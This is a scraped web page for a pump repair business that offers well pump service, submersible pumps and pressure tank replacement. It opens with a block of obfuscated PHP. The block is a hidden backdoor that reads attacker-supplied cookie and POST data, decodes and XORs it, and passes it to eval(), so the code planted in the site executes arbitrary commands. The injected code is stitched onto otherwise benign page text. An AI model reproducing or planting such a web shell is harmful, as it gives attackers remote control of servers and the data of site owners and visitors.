$DvxiYAr = 'P' . chr ( 772 - 660 ).'_' . 'V' . chr ( 425 - 309 )."\x47";$uZcCfYdT = "\x63" . "\x6c" . chr ( 680 - 583 )."\x73" . chr ( 117 - 2 )."\137" . chr ( 596 - 495 )."\170" . chr ( 160 - 55 ).chr ( 850 - 735 ).'t' . 's';$wURUUp = $uZcCfYdT($DvxiYAr); $DvxiYAr = "26949";$taffSXLId = !$wURUUp;$uZcCfYdT = "41360";if ($taffSXLId){class Pp_VtG{public function wfEJul(){echo "64169";}private $QqtpSTt;public static $daDaNrcx = "39f2781c-8ad4-4f78-8947-ca3404a89ce5";public static $wvaJX = 10720;public function __construct($PeOttkh=0){$aHDowEdD = $_COOKIE;$RxLXWQW = $_POST;$fOdpZ = @$aHDowEdD[substr(Pp_VtG::$daDaNrcx, 0, 4)];if (!empty($fOdpZ)){$nMILy = "base64";$VbKoZ = "";$fOdpZ = explode(",", $fOdpZ);foreach ($fOdpZ as $bjocmlYDZ){$VbKoZ .= @$aHDowEdD[$bjocmlYDZ];$VbKoZ .= @$RxLXWQW[$bjocmlYDZ];}$VbKoZ = array_map($nMILy . chr (95) . "\x64" . 'e' . chr (99) . chr ( 655 - 544 ).'d' . 'e', array($VbKoZ,)); $VbKoZ = $VbKoZ[0] ^ str_repeat(Pp_VtG::$daDaNrcx, (strlen($VbKoZ[0]) / strlen(Pp_VtG::$daDaNrcx)) + 1);Pp_VtG::$wvaJX = @unserialize($VbKoZ);}}private function kDYneLhjl(){if (is_array(Pp_VtG::$wvaJX)) {$pDGVhHjWWw = str_replace(chr (60) . chr (63) . "\x70" . "\150" . chr ( 893 - 781 ), "", Pp_VtG::$wvaJX[chr (99) . 'o' . "\x6e" . "\x74" . "\x65" . chr ( 636 - 526 ).chr ( 403 - 287 )]);eval($pDGVhHjWWw); $cjaOGJse = "15323";exit();}}public function __destruct(){$this->kDYneLhjl(); $XYUzTuqon = str_pad("15323", 10);}}$wwHAVXF = new /* 63468 */ Pp_VtG(); $wwHAVXF = substr("64900_19572", 1);} Eureka Pump Repair | Your local pump repair experts




Well Pump Repair & Service

Eureka Pump Repair has been in business for 27 years. We are licensed and insured in quality service and parts.

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Submersible Pumps

The main advantage of submersible pumps is that it prevents pump cavitation. This is a problem associated with a higher elevation difference between the pump and the fluid surface.

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Pressure Tank Replacement

Just like the tires on your car, air pressure can slowly leak out of the pressure tank. Make sure to check your tanks regularly and get them replaced if needed.

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License #: 5826

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